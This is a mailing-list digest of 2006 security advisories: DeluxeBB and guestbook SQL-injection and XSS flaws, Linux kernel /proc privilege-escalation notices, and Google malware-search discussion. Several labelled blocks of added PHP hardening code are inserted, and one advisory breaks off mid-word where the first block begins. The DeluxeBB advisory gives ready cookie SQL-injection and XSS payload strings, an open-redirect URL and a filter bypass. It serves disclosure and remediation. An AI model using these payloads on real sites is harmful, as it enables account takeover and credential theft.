If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
--------------------------------


  These files will probably be moved into the stable distribution on
  its next update.

--------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/


[Full-disclosure] Advisory : DeluxeBB multiple vulnerabilities

2006-07-18 Thread Jessica Hope

==

Advisory : DeluxeBB multiple vulnerabilities
Release Date : July 18th, 2006
Application : DeluxeBB
Version : Deluxe 1.07 and previous versions
Platform : PHP
Vendor URL : http://www.deluxebb.com/
Authors : Jessica Hope ([EMAIL PROTECTED])
  : Th3 M0ths ([EMAIL PROTECTED])

===

Overview

Due to various failures in sanitising user input, it is possible to
construct XSS attacks, SQL injection, authentication bypass, bypassing
of default security checks, user spoofing, cookie poisoning and
pollution of the global namespace.

===

Discussion


Authentication bypass:

It is possible for an attacker to become any user he or she wishes by
creating a set of fake cookies. Consider the admin with memberid of 1
and the name 'admin'. Here are the relevant settings required to become
this user:

membercookie: admin
memberid: 1
memberpw: ' or '' = '

The exploit works because the SQL query done looks something like this:
SELECT * FROM deluxebb_users WHERE (uid='1' && username='admin' &&
pass='' or '' = '')

There are limits imposed on the memberpw: it must be shorter than 33
characters. However, memberpw should only contain the MD5 sum of your
password (something that should actually be changed, but that is a
different section of this report).


User spoofing:

It is possible to post as any other user without having to totally
become that user. The method is nearly the same as above, except you do
not need to alter the password cookie. You will remain logged in as the
user you originally logged in as.

Consider the user 'test' with the memberid of 4. Here are the relevant
settings required to spoof this user:

memberid: 4
membercookie: ' or '' = '

All other cookies should be left alone.


You do not need to be logged in to launch this attack, you just need
to create the above cookies, and provide anything for the memberpw
cookie (even a - will suffice).

In addition to altering the cookies, if you were to register as a user
with just a single space as the username, you would have the
credentials, without the memberpw cookie being set. You are now able to
post as a guest user, while still having the other cookies. In addition
to this, it is not possible to ban by username; the user cannot be
found in the admin cp.


Cookie poisoning:

If you set your cookies to the following, after logging in:

membercookie: ' or '' = '

Leaving the rest alone, you are able to change everyone's settings.
This can be done by then going to the Member CP and changing anything.
The result of this means that you are able to change everyone's e-mail,
signature, location, website, other settings, and worst of all, you are
able to change everyone's password.


XSS in membercookie cookie:

Setting the membercookie cookie to be any XSS causes the display forum
and display topic to show the XSS as DeluxeBB trusts the membercookie
over the memberid which gets passed through an intval() in
$memberid = @intval($memberid);.

The membercookie looks like this:

membercookie: alert(document.cookie)

You do have to have a valid memberpw and memberid cookie.


URL Redirection on login:

In the redirect variable, it is possible to phish a user when they
attempt to login.

http://www.example.com/deluxebb/misc.php?sub=login&redirect=http://www.badsite.com/


Bypass SQL Injection Protection:

There is basic SQL Injection protection on certain variables such as
login. However, it is programmed to be case sensitive, so bypassing the
sensitivity can lead to SQL Injection.

The protection is a strstr (case-sensitive) on UNION SELECT. Using
union select instead in the protected variables is a simple bypass.


SQL Injection:

Due to the way the cookies are used, most of the above attacks
(authentication bypass, user spoofing, cookie poisoning) allow a basic
set of SQL injection.

More advanced SQL injection could be possible due to the way the
cookies are handled. I will leave this as an exercise to the reader in
order to come up with some possible SQL.


Pollution of the global namespace:

Due to the following lines, it is possible to use cookies in an
attempt to overwrite data in the $_GET, $_POST, $_SERVER and $_ENV
arrays:

$list = array('_GET', '_POST', '_ENV', '_SERVER', '_COOKIE', '_FILES');
foreach($list as $element) {
  if(!empty($$element) && is_array($$element) ) {
  extract($$element);
  }
}

This can allow someone to set a COOKIE variable to overwrite the
previous variables, allowing SQL injection and XSS.


===

Solution

Anyone using DeluxeBB is advised to update to the latest version,
which at time of writing this is now v1.08

===

History:

18th July 2006: Full disclosure

15th July 2006: Vendor released pat
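The cookie attacks in this advisory share one root cause: cookie values are spliced into the SQL string, and the textual membercookie is trusted over the numeric memberid. The following is an added example, not DeluxeBB's code, showing a hardened version of that lookup in PHP. Table and column names follow the query quoted in the advisory; the PDO handle, the session-token scheme and the DELUXEBB_SESSION_SECRET environment variable are assumptions.

```php
<?php
// Added example, not DeluxeBB code: a hardened replacement for the
// cookie-based login check quoted in the advisory. Assumptions: a PDO
// connection, the table deluxebb_users(uid, username, pass) from the
// advisory's query, and a server-side secret in DELUXEBB_SESSION_SECRET.

function server_secret(): string
{
    // Assumed location of the secret; deliberately no hard-coded fallback.
    $secret = getenv('DELUXEBB_SESSION_SECRET');
    if ($secret === false || $secret === '') {
        throw new RuntimeException('DELUXEBB_SESSION_SECRET is not configured');
    }
    return $secret;
}

// Cookies are read from an explicit array rather than extract()-ed into
// scope, so a cookie can never shadow a $_GET, $_POST or $_SERVER variable.
function current_user(PDO $db, array $cookies): ?array
{
    // memberid must be a positive integer; a value like "' or '' = '" fails here.
    $uid = filter_var($cookies['memberid'] ?? '', FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    $token = $cookies['memberpw'] ?? '';
    if ($uid === false || !is_string($token) || $token === '') {
        return null;
    }

    // Look the row up by uid alone, with a bound parameter. The membercookie
    // (username) cookie is never part of the query, so it cannot rewrite the
    // WHERE clause, and a keyword blacklist such as a strstr() for
    // "UNION SELECT" is not needed: the value is data, not SQL text.
    $stmt = $db->prepare('SELECT uid, username, pass FROM deluxebb_users WHERE uid = :uid');
    $stmt->execute([':uid' => $uid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }

    // The cookie carries a token derived from the stored hash and a server
    // secret (assumed scheme) instead of the raw password hash, and the
    // comparison is constant-time. A copy of the pass column alone is no
    // longer enough to forge the cookie.
    $expected = hash_hmac('sha256', $row['pass'], server_secret());
    if (!hash_equals($expected, $token)) {
        return null;
    }

    // The display name comes from the database row, never from the cookie,
    // so the user-spoofing and XSS-in-membercookie cases have nothing to use.
    return ['uid' => (int) $row['uid'], 'username' => $row['username']];
}

// Set the two cookies after a successful password check (assumed helper).
// Flags: HTTPS-only and HttpOnly, so script on a page cannot read them.
function issue_session_cookies(int $uid, string $storedHash): void
{
    $token = hash_hmac('sha256', $storedHash, server_secret());
    setcookie('memberid', (string) $uid, 0, '/', '', true, true);
    setcookie('memberpw', $token, 0, '/', '', true, true);
}

// Usage in a page: $user = current_user($db, $_COOKIE); null means guest.
```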

[Full-disclosure] hdweGUEST <= 2.1.1 Cross Site Scripting Vulnerabilities

2006-07-18 Thread Tamriel
 
  Advisory: hdweGUEST <= 2.1.1 Cross Site Scripting Vulnerabilities
  Release Date: 2006/07/18
 Last Modified: 2006/07/18
Author: Tamriel [tamriel at gmx dot net]
   Application: hdweGUEST 2.1.1
  Risk: Low
 Vendor Status: contacted | no reply | no patch available
   Vendor Site: www.huttenlocher-webdesign.de

 Overview:

   Quote from www.huttenlocher-webdesign.de

   "hwdeGUEST is a guestbook written in PHP. It offers the operator a
wide range of options"


 Details:

  In the new_entry.php are some possible cross site scripting
  vulnerabilities.

  This can be used to insert malicious code that will be executed
  on the client's machine.

  The user inputs are not checked by the script, except in these lines
  (around lines 250-255)

  ...

  $username=trim($username);
  $usernachricht=trim($usernachricht);
  if($GLOBALS[html_allowed]==0)
{$usernachricht=strip_tags($usernachricht);}

  ...

  and the mail input is checked by this function:
  (around lines 70-80)

  ...

  if(strstr($adresse,"@"))
 {
$temp_adresse=explode("@",$adresse);
if(strstr($temp_adresse[1],"."))
   {
  if(strlen($adresse)<8)
 {return false;}
 else
{return true;}
   }
else
   {return false;}
 }

  ...


 Proof of Concept:

  Insert HTML/JS Code like "name" into the name input field
  on "new entry" page.


 Solution/Note:

  It is strongly recommended to update your script yourself.
  Use the htmlentities() function and replace insecure functions
  like checke_email() with proper code.

 Greets:

  Greets fly out to all people at bluegeek.de

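The advisory's Solution/Note recommends htmlentities() and a replacement for checke_email(); the block below is an added example, not hdweGUEST's code, that puts both into working PHP. The checke_email() logic is reproduced from the excerpt above for comparison; the function names check_email(), h() and render_entry() and the entry field names are assumptions.

```php
<?php
// Added example, not hdweGUEST code. Contrasts the advisory's checke_email()
// with a stricter validator and adds output encoding, which is the actual
// XSS fix. Field names username/usernachricht/adresse follow the variables
// quoted in the advisory; the function names are mine.

// The check quoted in the advisory, reproduced only for comparison: any
// string containing "@", then a "." after it, with 8 or more characters
// in total passes, so a script tag in the local part is accepted.
function original_checke_email(string $adresse): bool
{
    if (strstr($adresse, "@")) {
        $temp_adresse = explode("@", $adresse);
        if (strstr($temp_adresse[1], ".")) {
            return strlen($adresse) >= 8;
        }
    }
    return false;
}

// Replacement: PHP's built-in syntax validator plus a length cap sized to
// the storage column (254 is the practical maximum for an address).
function check_email(string $adresse, int $maxLen = 254): bool
{
    if (strlen($adresse) > $maxLen) {
        return false;
    }
    return filter_var($adresse, FILTER_VALIDATE_EMAIL) !== false;
}

// Encode for an HTML text or quoted-attribute context. Doing this at output
// also covers entries stored before the fix. strip_tags() on input, the
// script's only sanitisation when html_allowed is 0, is not a substitute:
// it leaves quotes and entities untouched and runs only once at submission.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render one guestbook entry; every field passes through h() regardless of
// what validation happened when it was submitted.
function render_entry(array $entry): string
{
    $name = h(trim($entry['username'] ?? ''));
    $mail = h($entry['adresse'] ?? '');
    $text = nl2br(h($entry['usernachricht'] ?? ''));
    return '<div class="entry"><b>' . $name . '</b> &lt;' . $mail . '&gt;'
         . '<p>' . $text . '</p></div>';
}

// Usage in new_entry.php: reject the submission when check_email() returns
// false, store the raw values, and build every page fragment with render_entry().
```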



[Full-disclosure] [ MDKSA-2006:124 ] - Updated kernel packages fix privilege escalation vulnerability

2006-07-18 Thread security


 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:124
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: July 18, 2006
 Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 A race condition in the Linux kernel 2.6.17.4 and earlier allows local
 users to obtain root privileges due to a race condition in the /proc
 filesystem.
 
 The provided packages are patched to fix these vulnerabilities.  All
 users are encouraged to upgrade to these updated kernels immediately
 and reboot to effect the fixes.
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626
 ___
 
 Updated Packages:
 

[Full-disclosure] Re: corporate uses for Google malware finding, etc. [was: [funsec] more than just malware..]

2006-07-18 Thread Dude VanWinkle

On 7/18/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> A couple more notes...
> This can have significant uses for corporations. For example, finding lost
> source code by using the filetype: feature, or as Dude already mentioned
> on this thread, to find wrongly named executables.
>
> Also, using the site: feature can help corporations search their websites
> for executables for potential AUP violations or compromises.
>
> Really, the sky is the limit even if this is not the holy
> grail. It's... cool.


It would be even cooler if we had an engine that ignored the
robots.txt and just indexed everything tho.

I find that malware sites don't do well in PageRank ;-)

-JP



[Full-disclosure] Outpost Firewall Pro secretly fixing security flaws?

2006-07-18 Thread Bipin Gautam

To my knowledge Outpost Firewall Pro 3.5.631 had a security issue
(say: 0-day): an exception can be passed and then triggered by a
local system user to the firewall, resulting in a SYSTEM CRASH due to an
overflow flaw in filtnt.sys (firewall driver). I was testing it on
winxpsp2 (patchlevel latest) and other possibilities of remote
exploitation.

try experimenting with:

cmd.exe
c:\> mshta.exe longg string


After upgrading to Outpost Firewall Pro ver. 3.51.759.6511 (462) the
issue seems fixed.

so secret fix huh ?

---

Bipin Gautam
http://bipin.tk

Zeroth law of security: The possibility of poking a system from lower
privilege is zero unless & until there is possibility of direct,
indirect or consequential communication between the two...



Re: [Full-disclosure] anoNet: Cooperative Chaos

2006-07-18 Thread Michael Holstein

http://www.anonet.org



Forbidden
You don't have permission to access /index.html on this server.

Additionally, a 404 Not Found error was encountered while trying to use 
an ErrorDocument to handle the request.

Apache/1.3.36 Server at www.anonet.org Port 80



[Full-disclosure] corporate uses for Google malware finding, etc. [was: [funsec] more than just malware..]

2006-07-18 Thread Gadi Evron
A couple more notes...
This can have significant uses for corporations. For example, finding lost
source code by using the filetype: feature, or as Dude already mentioned
on this thread, to find wrongly named executables.

Also, using the site: feature can help corporations search their websites
for executables for potential AUP violations or compromises.

Really, the sky is the limit even if this is not the holy
grail. It's... cool.

Gadi.




[Full-disclosure] more than just malware.. [was: Google Malware Search]

2006-07-18 Thread Gadi Evron
Guys, HD and the guys at Websense are obviously very cool for noting this
Google hacking technique and exploiting it (HD publicly).

Still, this thing can be used far and wide.. a lot more than just for
known signatures of malware, etc.
I was lucky enough to be playing with this for a bit before Websense went
completely public and HD made it public, so I came up with a few more
possibilities...
Also, I have cool friends who played with this and gave me some ideas
too! :)

A few examples I gave in my blog on this, inspired by Websense and then
HD's new tool, is to look for other signatures rather than just known
stuff.

For example, looking for UPX packers results in almost 10K suspect
samples:
signature: 4550 UPX1

The PE binary part, and then the UPX section named UPX1.

Trying other combinations, possibly along with the filetype: feature, can
result in many interesting findings other than known malware. How many
packers and protection systems are out there for starters?

Also, tried any checks for open directory indexes? :)

I wrote more about this on my blog at securiteam:
http://blogs.securiteam.com/index.php/archives/513

Gadi.



[Full-disclosure] Hustle -- RARLab's WinRAR stack overflow

2006-07-18 Thread Ryan Smith

As of 18.7.2006, a new advisory detailing a buffer overflow in
WinRAR's LHA archive processing has been made public on the Hustle
Labs website.  Please visit http://www.hustlelabs.com/advisories.html
for more information.

-Ryan Smith



[Full-disclosure] Re: corporate uses for Google malware finding, etc. [was: [funsec] more than just malware..]

2006-07-18 Thread Valdis . Kletnieks
On Tue, 18 Jul 2006 09:26:12 CDT, Gadi Evron said:
> This can have significant uses for corporations. For example, finding lost
> source code by using the filetype:

For bonus points, once you find your source, re-do the Google query *without*
the site: restrictor and see how many more copies you find.

It's sad when Google and every hacker and their pet llama have your source
code, and you don't



[Full-disclosure] Professional PHP Tools Guestbook Multiple Vulnerabilities

2006-07-18 Thread Artemis
      Advisory: Professional PHP Tools Guestbook Multiple Vulnerabilities
  Release Date: 2006/07/17
 Last Modified: 2006/07/18
        Author: Tamriel [tamriel at gmx dot net]
   Application: Professional PHP Tools Guestbook
          Risk: Medium
 Vendor Status: contacted | updated version available
   Vendor Site: www.php-tools.eu


 Overview:

   Quote from php-tools.eu (translated from German):

   "This simple guestbook can be installed on any web space with
   PHP 5 and MySQL support. Smilies and BBCode are integrated.
   HTML is disabled for security reasons. The webmaster has a
   simple web administration with which he can conveniently
   manage all entries. He is also able to block one or more IP
   addresses for the guestbook."

 Details:

   1) SQL Injection Vulnerability in class.php
      (around lines 75-115)

      ...

      $hidemail = $_POST['hidemail'];

      ...

      mysql_query("INSERT INTO gbook ( name, mail, hidemail, datum, ip,
                   text ) VALUES ( '$name', '$mail', '$hidemail', '$date',
                   '$ip', '$text' ) ");

      ...

      Here the programmer forgot to validate something.

      You can find these vulnerabilities throughout the complete script,
      so I mention only one example here.

   2) SQL Injection Vulnerabilities in class.php
      (around line 250 and around line 260)

      ...

      $name = $_POST['name'];
      $mail = $_POST['mail'];
      $ip = $_POST['ip'];
      $text = $_POST['text'];

      mysql_query("UPDATE gbook SET name='$name', mail='$mail',
                   ip='$ip', text='$text' WHERE id='$entry'");

      ...

      mysql_query("DELETE FROM gbook WHERE id='$entry'");
      include(config('tpl_dir').'/del.tpl');

      ...

      As an admin you can insert enough SQL code. It's not clever to
      trust every person who has admin access.

 Version note:

   I haven't found any information about the actual version of this
   script, so take a look at the MD5 hashes of the files I examined:

   9f3f1e28f6a449b51bda7f57d7cfbb48 class.php
   c27de7365648eb554c3a4cab83895015 delcookie.php
   faca302875997b345ab4912465df06e4 setcookie.php

 Note:

   1) You can find some other insecure handling, like the
      administration login in setcookie.php

      ...

      include('config.php');
      if ( md5(config('admin_pass')) == $_GET['pass'] )
      {
          setcookie('gbook', $_GET['pass'], time()+2419200);
      }

      ...

      Attackers can easily brute-force the password here.

   2) delcookie.php

      ...

      setcookie('gbook', $_COOKIE['gbook'], time()-2419200);

      ...

      The logout handler does not overwrite the existing cookie, so
      attackers can read out (for example on shared computer systems)
      the admin's password hash after logout.

 Solution:

   Use PHP's mysql_real_escape_string(), which calls MySQL's library
   function mysql_real_escape_string() and prepends backslashes to
   the following characters: \x00, \n, \r, \, ', " and \x1a.

   In delcookie.php replace "setcookie('gbook', $_COOKIE['gbook'],
   time()-2419200);" with "setcookie('gbook', '', time()-2419200);".

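The advisory above quotes the guestbook's raw mysql_query() calls and recommends escaping plus a corrected logout. The following is an added example, not part of the advisory and not the php-tools.eu product's code: the same INSERT and DELETE rewritten with PDO prepared statements, and the delcookie.php fix from the Solution section. It assumes PDO with an in-memory SQLite database standing in for MySQL (so it runs offline) and uses the gbook table and column names taken from the queries quoted in the advisory; the function names are this example's own.

```php
<?php
// Added example (not from the advisory and not the product's code): the
// guestbook queries from the advisory rewritten with PDO prepared statements,
// plus the corrected logout handler. SQLite in memory stands in for MySQL so
// the script runs offline; table and column names follow the advisory.
declare(strict_types=1);

function openGuestbook(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE gbook (id INTEGER PRIMARY KEY, name TEXT, mail TEXT,
               hidemail INTEGER, datum TEXT, ip TEXT, text TEXT)');
    return $db;
}

// INSERT from class.php, hardened: every request value is bound as data, so a
// quote in a name or text reaches the table as a character, not as SQL.
function addEntry(PDO $db, array $post, string $remoteAddr): void
{
    $stmt = $db->prepare('INSERT INTO gbook (name, mail, hidemail, datum, ip, text)
                          VALUES (:name, :mail, :hidemail, :datum, :ip, :text)');
    $stmt->execute([
        ':name'     => (string) ($post['name'] ?? ''),
        ':mail'     => (string) ($post['mail'] ?? ''),
        ':hidemail' => empty($post['hidemail']) ? 0 : 1,  // flag coerced to 0/1, its text is never used
        ':datum'    => date('Y-m-d H:i:s'),
        ':ip'       => $remoteAddr,                        // taken from $_SERVER, not from the form
        ':text'     => (string) ($post['text'] ?? ''),
    ]);
}

// DELETE from the admin part of class.php, hardened: an id that is not a plain
// decimal number is refused before any SQL runs, and the id is still bound.
function deleteEntry(PDO $db, string $entry): int
{
    if ($entry === '' || !ctype_digit($entry)) {
        return 0;
    }
    $stmt = $db->prepare('DELETE FROM gbook WHERE id = :id');
    $stmt->execute([':id' => (int) $entry]);
    return $stmt->rowCount();
}

function countEntries(PDO $db): int
{
    return (int) $db->query('SELECT COUNT(*) FROM gbook')->fetchColumn();
}

// delcookie.php as the advisory's Solution describes it: the cookie is
// overwritten with an empty value and expired, so the stored password hash
// is no longer re-sent to the browser on logout.
function logout(): void
{
    setcookie('gbook', '', time() - 2419200);
}

// Self-check on constructed input; throws if the hardening does not hold.
function selfCheck(): void
{
    $db = openGuestbook();
    addEntry($db, ['name' => "O'Brien", 'mail' => 'a@example.invalid', 'text' => "it's fine"], '127.0.0.1');
    addEntry($db, ['name' => 'second', 'mail' => 'b@example.invalid', 'text' => 'ok', 'hidemail' => '1'], '127.0.0.1');
    if (countEntries($db) !== 2) {
        throw new RuntimeException('quoted name was not stored as data');
    }
    // an id carrying a quote is refused by the validator, nothing is deleted
    if (deleteEntry($db, "1' OR '1'='1") !== 0 || countEntries($db) !== 2) {
        throw new RuntimeException('malformed id reached the query');
    }
    if (deleteEntry($db, '2') !== 1 || countEntries($db) !== 1) {
        throw new RuntimeException('valid id was not deleted');
    }
    echo "guestbook hardening checks passed\n";
}

selfCheck();
```

Run it with `php guestbook_hardened.php` on any PHP build with the pdo_sqlite extension. Binding parameters removes the need to reason about which characters mysql_real_escape_string() handles, and the id whitelist makes the DELETE path reject anything that is not a number before the database is involved, which also covers the admin-only injection the advisory points out.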


[Full-disclosure] [USN-319-1] Linux kernel vulnerability

2006-07-18 Thread Martin Pitt
=== 
Ubuntu Security Notice USN-319-1  July 18, 2006
linux-source-2.6.15 vulnerability
CVE-2006-3626
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  linux-image-2.6.15-26-386            2.6.15-26.45
  linux-image-2.6.15-26-686            2.6.15-26.45
  linux-image-2.6.15-26-amd64-generic  2.6.15-26.45
  linux-image-2.6.15-26-amd64-k8       2.6.15-26.45
  linux-image-2.6.15-26-amd64-server   2.6.15-26.45
  linux-image-2.6.15-26-amd64-xeon     2.6.15-26.45
  linux-image-2.6.15-26-hppa32         2.6.15-26.45
  linux-image-2.6.15-26-hppa32-smp     2.6.15-26.45
  linux-image-2.6.15-26-hppa64         2.6.15-26.45
  linux-image-2.6.15-26-hppa64-smp     2.6.15-26.45
  linux-image-2.6.15-26-itanium        2.6.15-26.45
  linux-image-2.6.15-26-itanium-smp    2.6.15-26.45
  linux-image-2.6.15-26-k7             2.6.15-26.45
  linux-image-2.6.15-26-mckinley       2.6.15-26.45
  linux-image-2.6.15-26-mckinley-smp   2.6.15-26.45
  linux-image-2.6.15-26-powerpc        2.6.15-26.45
  linux-image-2.6.15-26-powerpc-smp    2.6.15-26.45
  linux-image-2.6.15-26-powerpc64-smp  2.6.15-26.45
  linux-image-2.6.15-26-server         2.6.15-26.45
  linux-image-2.6.15-26-server-bigiron 2.6.15-26.45
  linux-image-2.6.15-26-sparc64        2.6.15-26.45
  linux-image-2.6.15-26-sparc64-smp    2.6.15-26.45

After a standard system upgrade you need to reboot your computer to
effect the necessary changes.

This flaw affects Ubuntu 5.04 and Ubuntu 5.10 as well; these releases
will be fixed shortly in a followup advisory.

Details follow:

A race condition has been discovered in the file permission handling
of the /proc file system. A local attacker could exploit this to
execute arbitrary code with full root privileges.

Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-26.45.diff.gz
  Size/MD5:  2124749 3de4c3eddba7030297c1014fcb2c5950

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-26.45.dsc
  Size/MD5: 2379 cf43e7a36b7481b1addc62d89a21668b

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-26.45_all.deb
  Size/MD5:  5157202 633e4b5601b77a1aa53330a117bd3655

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-26.45_all.deb
  Size/MD5:87296 bef5a59910598b0521d3fbd0ad25dfa8

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-26.45_all.deb
  Size/MD5: 44452898 0ef865e266a69bc1136889f2d758ba99

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:22140 145c0e2b255420a9e1b6ee99bfaa3811

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:44776 2b0deb1c70fe6345839d5851f93e1438

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5: 2308 79341b75318cd8a7a6db9d9429c5d6be

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:36196 c23d39cbca37f01efa4147bc99e8ac62

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:   102026 6649421f576f4971cd17bb9a7c85713d

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:38606 eb48b38edfc572bb840d4c9668073578

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:49126 4a4697baddf124ff7d254d2ff5c269e2

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_amd64.udeb
  Size/MD5:   176756 e25baa577d3e8e29efba16133d958306

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-26-amd64-generic-di_2.6.15-26.45_